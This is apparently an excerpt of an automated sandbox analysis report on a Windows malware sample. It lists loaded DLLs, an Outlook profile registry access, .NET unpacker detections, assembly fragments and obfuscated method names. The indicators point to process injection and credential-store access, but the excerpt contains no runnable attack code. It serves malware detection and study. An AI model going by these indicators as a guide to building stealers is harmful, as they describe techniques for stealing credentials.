                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: net.pdbUGP source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Gd3lOevK672JYIK.zip.exe, Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640328114.0000000001810000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 0000000B.00000002.4654353375.0000000003020000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000002.4654353375.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2642047366.0000000002CC1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000000B.00000003.2644383474.0000000002E79000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: net.pdb source: Gd3lOevK672JYIK.zip.exe, 00000004.00000002.2640074338.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000A.00000003.2737681953.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TjdgrMPwNLGImh.exe, 0000000A.00000000.2563425890.000000000085F000.00000002.00000001.01000000.0000000C.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000000.2714217135.000000000085F000.00000002.00000001.01000000.0000000C.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs.Net Code: m4PmYcEFUM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs.Net Code: m4PmYcEFUM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47aac08.4.raw.unpack, gPhmQVK0Q7BimSL0Ik.cs.Net Code: m4PmYcEFUM System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.3cc9f78.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.3ca9f58.3.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4AC98 push eax; iretd 0_2_06D4AC99
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 0_2_06D4C0D0 push cs; ret 0_2_06D4C0D1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00413863 push ecx; retf E958h4_2_00413919
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00401868 push 0000003Dh; retf 4_2_00401899
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00417828 push esi; iretd 4_2_00417848
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0041F0C3 push edi; iretd 4_2_0041F0CF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004031B0 push eax; ret 4_2_004031B2
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00404B72 push edi; ret 4_2_00404B7A
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0041738C push ds; retf 4_2_004173A1
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004083BA push esi; iretd 4_2_004083F5
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00404C4C pushfd ; ret 4_2_00404C4D
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0041556F push eax; retf 4_2_00415572
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_004145BD push 00000034h; iretd 4_2_004145BF
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_00415EBF push esp; iretd 4_2_00415ECC
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0181225F pushad ; ret 4_2_018127F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018127FA pushad ; ret 4_2_018127F9
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_018409AD push ecx; mov dword ptr [esp], ecx4_2_018409B6
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_0181283D push eax; iretd 4_2_01812858
                Source: C:\Users\user\Desktop\Gd3lOevK672JYIK.zip.exeCode function: 4_2_01811200 push eax; iretd 4_2_01811369
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489B4BC push eax; retf 10_2_0489B4BF
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489C4FB push edx; retf 10_2_0489C501
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489BE0C push esp; iretd 10_2_0489BE19
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489D774 push esi; iretd 10_2_0489D795
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_048A5010 push edi; iretd 10_2_048A501C
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0488AABF push edi; ret 10_2_0488AAC7
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0489D2D9 push ds; retf 10_2_0489D2EE
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0488AB99 pushfd ; ret 10_2_0488AB9A
                Source: C:\Program Files (x86)\QlYZARHIJVBZedAlXLnCHqizEnjMtyAONjAlnHvdzEaTEkDez\TjdgrMPwNLGImh.exeCode function: 10_2_0488E307 push esi; iretd 10_2_0488E342
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_0302225F pushad ; ret 11_2_030227F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030227FA pushad ; ret 11_2_030227F9
                Source: C:\Windows\SysWOW64\net.exeCode function: 11_2_030509AD push ecx; mov dword ptr [esp], ecx11_2_030509B6
                Source: Gd3lOevK672JYIK.zip.exeStatic PE information: section name: .text entropy: 7.722966288438935
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, sfF1AvkoUaYuUINDnp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Kk2bx9Fwew', 'CDtbj2T5mJ', 'sNybzHoDnr', 'un1Juw7LXJ', 'Bj3Jvi0EUR', 'XUFJbRWhXN', 'CTNJJeDfYH', 'HZRLvvXibY7JOXgyUAW'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, EOl4M4m0EwEs0A4E1N.csHigh entropy of concatenated method names: 'zpJpABQWE9', 'MTopqyBVtf', 'pExppQnRJW', 'DN6pfAXrxw', 'VpspHt8uvZ', 'kcZpTYFpxZ', 'Dispose', 'WxTdVZZXMm', 'VCvdskF0WY', 'qEsd4nVDvi'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, Q0QXQTVYbrCmLqw9blB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ngX9pb62EP', 'TJa9hbBLu8', 'amm9fObl6e', 'NsM99ASjQC', 'ovH9HGauvO', 'zlo92vBNqB', 'QhP9TePTeR'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, icu7vy73dA81VP8Gl9.csHigh entropy of concatenated method names: 'ToString', 'pS0XMlLdBn', 'PhoXSLnNwJ', 'GeVXlkARBh', 'WE3X7Yhd2Q', 'QIEXrAP1bX', 'JDEXoHBVnm', 'aMIX0kr2gu', 'OybXCyAxnt', 'Sb5XyqwfON'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, wTJkkY3RGXoYNOE4fQ.csHigh entropy of concatenated method names: 'R4dA3WkGpb', 'LbgAneaQqf', 'mDQAgyhHS1', 'Ko7Aa3K1AU', 'XwDASxrmmP', 'XbeAloIgVC', 'gSsA7qZmkd', 'vZxArJh4FU', 'LAkAoFryXw', 'uFXA02OkNS'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, SpYqQbJxQTpD4vNABf.csHigh entropy of concatenated method names: 'zmgIUrN839', 'xvgIF1X6E7', 'LQQIKPjRXE', 'E3sIS4qy5Y', 'IRbI7GVPCR', 'S2yIrXMUZm', 'JHOI08iGqs', 'dscICsNiGe', 'krII3TFoco', 'TYhIMVbPNQ'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, LQqdA6ckXYOJRum1Vw.csHigh entropy of concatenated method names: 's0uh4VpAjY', 'aNAhZ4WaRg', 'H5IhPClYbr', 'NR7hEs4Y09', 'qD7hp0Crbo', 'xN3hBw3KD9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gPhmQVK0Q7BimSL0Ik.csHigh entropy of concatenated method names: 'RJZJRqibdG', 'TUtJVYUmKV', 'lJOJsrrxc7', 'GqwJ47YnLc', 'ngoJZQZb90', 'dGpJPUUN4l', 'vWlJE6YRfN', 'agCJBFB9fZ', 'lD8JNqbo3j', 'MVKJeSNA7J'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, gbIZeiEITbeEjX9v2O.csHigh entropy of concatenated method names: 'LI9qWC8Xt9', 'l4TqjsdbcU', 'qcbdujwNhq', 'sNjdvmvnbO', 'WhJqMlG8lS', 'vKvqnO9FLS', 'VMXq6V1C2p', 'Vt0qglbuIX', 'nR6qaAS19B', 'BpXqcr0AK4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, dUgE0WFeMmwqcthSsi.csHigh entropy of concatenated method names: 'LxSpKunyLG', 'EmipS7cUvO', 'reZplytebB', 'qXYp7ViAN0', 'UseprlZm4u', 'yurpoNgc1T', 'Qf5p0O6eO8', 'VdBpCIbdwE', 'Ng9py077JA', 'usBp3Wdm8F'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, tmug9NaSrarT6mnnuH.csHigh entropy of concatenated method names: 'zSgsgr5CxO', 'vgxsaQkpBx', 'wdfscnXyNe', 'AM1sDqTPGQ', 'n1Aswu4GFZ', 'B4Hs191SOZ', 'k61s523d9o', 'Sb5sW190WD', 'A00sx4PZbt', 'ECjsjcKly6'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, JqFSsZtBBDaoutcR4d.csHigh entropy of concatenated method names: 'oZ7PR8dPKH', 'I9WPs072c9', 'zZOPZFrB9u', 'v0jPEKY0yW', 'TqmPBGFt1E', 'O4IZwPT9lJ', 'wiAZ1e6ElP', 'VkSZ53bfSr', 'uIMZWblZGM', 'p2lZxuMo9E'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, SX3KtaS81LM1DEh2Pi.csHigh entropy of concatenated method names: 'Dispose', 'h4qvx2jO34', 'YgKbSSN5br', 'Ytf9w6ldeY', 'zLhvjHnoRu', 'oXkvzdMoZj', 'ProcessDialogKey', 'kHHbuquu4I', 'BWQbvojmhF', 'tOCbbpln8P'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, r7grjtYOFfuOwO35vD.csHigh entropy of concatenated method names: 'yegvEDcIbV', 'mY1vB4Em1y', 'wFqve6gci2', 'HvHvtN7OPf', 'tgPvAt5rVw', 'ucUvXTa5Ac', 'YO9QHlQSbR6eE8TRX4', 'RcRojusiiIgKxGO1EY', 'rkG6mtO0O3qnY366Nd', 'FcivvErK7p'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, xHuCyUNVgijPJihWyi.csHigh entropy of concatenated method names: 'xoFPcx3ZiE', 'YnNPDLiG3t', 'RCwPwFVY2E', 'ToString', 'oOJP13MVsF', 'xxCP5E8Ja7', 'Csu4ZQLvS0AiyPBemsw', 'to9lJJLDhgsG1gb2D7Y', 'KQGA2dLeV8iU7nLthkZ', 'IILaK9LMZeF9SKxHe59'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, IawIjFBJhrAMATLEmD.csHigh entropy of concatenated method names: 'qUlY6BoWq', 'mEvkFZlVg', 'agDGWdPXj', 'g4p8TBGQR', 'oAjFxEl3r', 'GraOsrfU2', 'ktXcPMmSCL5VbVDKfo', 'MwK1ia9WFikwuWwM5O', 'X4GdxHS9K', 'BCghFmMWI'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, OKdsLYz9V6KEiBqfMy.csHigh entropy of concatenated method names: 'Gk4hGnxVAq', 'gHShUoVm3S', 'kJyhFrmBgq', 'yMfhKvpSZy', 'U38hSXlAYr', 'wQOh7JI9f7', 'fMXhrfR8mY', 'XjNhTod5al', 'YM4hij5SBB', 'Ah2hQg0UF7'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, NlGL1XOTFh72rhSpbZ.csHigh entropy of concatenated method names: 'oC5ZLZVitX', 'yh7Z87vsXT', 'koW4lLrdZI', 'FiN47NypZL', 'IQ84ryo9kM', 'aUm4o03Gxa', 'CnV40y9T09', 'VMU4Cpt1eK', 'NSf4yyXG6l', 'F2243qY39k'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, Nu12WkVVrJhpkFxrfpy.csHigh entropy of concatenated method names: 'TlihjTIt1C', 'nC2hz1bVdy', 'kuefuGTZC2', 'p8gfvdnLwh', 'CC7fb32jmT', 'voGfJZRUWx', 'aZafmCM4jk', 'DELfRIAZeZ', 'k9cfVH857e', 'zfSfsKyZYU'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, lnvcOeVRwtKOkU4lWK5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YDShMMbwdH', 'qGKhnrw9j5', 'jTUh6kq4vm', 'wqJhgSKd2x', 'sa4hat0nMl', 'XcMhcWH6aW', 'HZHhDp7u6B'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, BhpI7xZJ8bG6DnnZfg.csHigh entropy of concatenated method names: 'DdIEiehfYv', 'YshEQmYQlS', 'XQ5EYGk4yT', 'zxQEkoNKe8', 'vaDELYt82D', 'zV4EGiRB5n', 'CJGE880MBB', 'ClWEUNAagc', 'TwaEFKoq4R', 'H6XEOhsXbA'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, kg1CTFWYTIlJYyVcQL.csHigh entropy of concatenated method names: 'dD7EVFSwvH', 'DCEE4OP7SF', 'sK2EPPxwW1', 'LdnPj9AcZE', 'uK8PzkoVjn', 'vLvEu3jxpX', 'kpWEvtJd1M', 'o0nEbwTT7V', 'jsnEJAZJiy', 'm5JEmp8HF4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, dJ60rUjheZ1KB4814D.csHigh entropy of concatenated method names: 'htx4kHZgSD', 'Lma4G1MOMo', 'rot4U9fPUc', 'IjT4FfcNgv', 'bWy4AC17p8', 'E8F4XKrL6N', 'rE64qyl1pj', 'qIa4dQmeWr', 'Po54pmnthO', 'dQ34hbCGqp'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.47201e8.2.raw.unpack, O8v7FsG65UW97xjpg0.csHigh entropy of concatenated method names: 'meCqes7rLd', 'IjHqtudB5N', 'ToString', 'vhqqV8ghXN', 'usCqsVUx2p', 'KLoq4Xy7SA', 'iaiqZLDhVE', 'heoqPiaebU', 'DEmqE5N9hO', 'BdRqBMWfnf'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, sfF1AvkoUaYuUINDnp.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Kk2bx9Fwew', 'CDtbj2T5mJ', 'sNybzHoDnr', 'un1Juw7LXJ', 'Bj3Jvi0EUR', 'XUFJbRWhXN', 'CTNJJeDfYH', 'HZRLvvXibY7JOXgyUAW'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, EOl4M4m0EwEs0A4E1N.csHigh entropy of concatenated method names: 'zpJpABQWE9', 'MTopqyBVtf', 'pExppQnRJW', 'DN6pfAXrxw', 'VpspHt8uvZ', 'kcZpTYFpxZ', 'Dispose', 'WxTdVZZXMm', 'VCvdskF0WY', 'qEsd4nVDvi'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, Q0QXQTVYbrCmLqw9blB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ngX9pb62EP', 'TJa9hbBLu8', 'amm9fObl6e', 'NsM99ASjQC', 'ovH9HGauvO', 'zlo92vBNqB', 'QhP9TePTeR'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, icu7vy73dA81VP8Gl9.csHigh entropy of concatenated method names: 'ToString', 'pS0XMlLdBn', 'PhoXSLnNwJ', 'GeVXlkARBh', 'WE3X7Yhd2Q', 'QIEXrAP1bX', 'JDEXoHBVnm', 'aMIX0kr2gu', 'OybXCyAxnt', 'Sb5XyqwfON'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, wTJkkY3RGXoYNOE4fQ.csHigh entropy of concatenated method names: 'R4dA3WkGpb', 'LbgAneaQqf', 'mDQAgyhHS1', 'Ko7Aa3K1AU', 'XwDASxrmmP', 'XbeAloIgVC', 'gSsA7qZmkd', 'vZxArJh4FU', 'LAkAoFryXw', 'uFXA02OkNS'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, SpYqQbJxQTpD4vNABf.csHigh entropy of concatenated method names: 'zmgIUrN839', 'xvgIF1X6E7', 'LQQIKPjRXE', 'E3sIS4qy5Y', 'IRbI7GVPCR', 'S2yIrXMUZm', 'JHOI08iGqs', 'dscICsNiGe', 'krII3TFoco', 'TYhIMVbPNQ'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, LQqdA6ckXYOJRum1Vw.csHigh entropy of concatenated method names: 's0uh4VpAjY', 'aNAhZ4WaRg', 'H5IhPClYbr', 'NR7hEs4Y09', 'qD7hp0Crbo', 'xN3hBw3KD9', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gPhmQVK0Q7BimSL0Ik.csHigh entropy of concatenated method names: 'RJZJRqibdG', 'TUtJVYUmKV', 'lJOJsrrxc7', 'GqwJ47YnLc', 'ngoJZQZb90', 'dGpJPUUN4l', 'vWlJE6YRfN', 'agCJBFB9fZ', 'lD8JNqbo3j', 'MVKJeSNA7J'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, gbIZeiEITbeEjX9v2O.csHigh entropy of concatenated method names: 'LI9qWC8Xt9', 'l4TqjsdbcU', 'qcbdujwNhq', 'sNjdvmvnbO', 'WhJqMlG8lS', 'vKvqnO9FLS', 'VMXq6V1C2p', 'Vt0qglbuIX', 'nR6qaAS19B', 'BpXqcr0AK4'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, dUgE0WFeMmwqcthSsi.csHigh entropy of concatenated method names: 'LxSpKunyLG', 'EmipS7cUvO', 'reZplytebB', 'qXYp7ViAN0', 'UseprlZm4u', 'yurpoNgc1T', 'Qf5p0O6eO8', 'VdBpCIbdwE', 'Ng9py077JA', 'usBp3Wdm8F'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, tmug9NaSrarT6mnnuH.csHigh entropy of concatenated method names: 'zSgsgr5CxO', 'vgxsaQkpBx', 'wdfscnXyNe', 'AM1sDqTPGQ', 'n1Aswu4GFZ', 'B4Hs191SOZ', 'k61s523d9o', 'Sb5sW190WD', 'A00sx4PZbt', 'ECjsjcKly6'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, JqFSsZtBBDaoutcR4d.csHigh entropy of concatenated method names: 'oZ7PR8dPKH', 'I9WPs072c9', 'zZOPZFrB9u', 'v0jPEKY0yW', 'TqmPBGFt1E', 'O4IZwPT9lJ', 'wiAZ1e6ElP', 'VkSZ53bfSr', 'uIMZWblZGM', 'p2lZxuMo9E'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, SX3KtaS81LM1DEh2Pi.csHigh entropy of concatenated method names: 'Dispose', 'h4qvx2jO34', 'YgKbSSN5br', 'Ytf9w6ldeY', 'zLhvjHnoRu', 'oXkvzdMoZj', 'ProcessDialogKey', 'kHHbuquu4I', 'BWQbvojmhF', 'tOCbbpln8P'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, r7grjtYOFfuOwO35vD.csHigh entropy of concatenated method names: 'yegvEDcIbV', 'mY1vB4Em1y', 'wFqve6gci2', 'HvHvtN7OPf', 'tgPvAt5rVw', 'ucUvXTa5Ac', 'YO9QHlQSbR6eE8TRX4', 'RcRojusiiIgKxGO1EY', 'rkG6mtO0O3qnY366Nd', 'FcivvErK7p'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, xHuCyUNVgijPJihWyi.csHigh entropy of concatenated method names: 'xoFPcx3ZiE', 'YnNPDLiG3t', 'RCwPwFVY2E', 'ToString', 'oOJP13MVsF', 'xxCP5E8Ja7', 'Csu4ZQLvS0AiyPBemsw', 'to9lJJLDhgsG1gb2D7Y', 'KQGA2dLeV8iU7nLthkZ', 'IILaK9LMZeF9SKxHe59'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, IawIjFBJhrAMATLEmD.csHigh entropy of concatenated method names: 'qUlY6BoWq', 'mEvkFZlVg', 'agDGWdPXj', 'g4p8TBGQR', 'oAjFxEl3r', 'GraOsrfU2', 'ktXcPMmSCL5VbVDKfo', 'MwK1ia9WFikwuWwM5O', 'X4GdxHS9K', 'BCghFmMWI'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, OKdsLYz9V6KEiBqfMy.csHigh entropy of concatenated method names: 'Gk4hGnxVAq', 'gHShUoVm3S', 'kJyhFrmBgq', 'yMfhKvpSZy', 'U38hSXlAYr', 'wQOh7JI9f7', 'fMXhrfR8mY', 'XjNhTod5al', 'YM4hij5SBB', 'Ah2hQg0UF7'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, NlGL1XOTFh72rhSpbZ.csHigh entropy of concatenated method names: 'oC5ZLZVitX', 'yh7Z87vsXT', 'koW4lLrdZI', 'FiN47NypZL', 'IQ84ryo9kM', 'aUm4o03Gxa', 'CnV40y9T09', 'VMU4Cpt1eK', 'NSf4yyXG6l', 'F2243qY39k'
                Source: 0.2.Gd3lOevK672JYIK.zip.exe.a240000.6.raw.unpack, Nu12WkVVrJhpkFxrfpy.csHigh entropy of concatenated method names: 'TlihjTIt1C', 'nC2hz1bVdy', 'kuefuGTZC2', 'p8gfvdnLwh', 'CC7fb32jmT', 'voGfJZRUWx', 'aZafmCM4jk', 'DELfRIAZeZ', 'k9cfVH857e', 'zfSfsKyZYU'
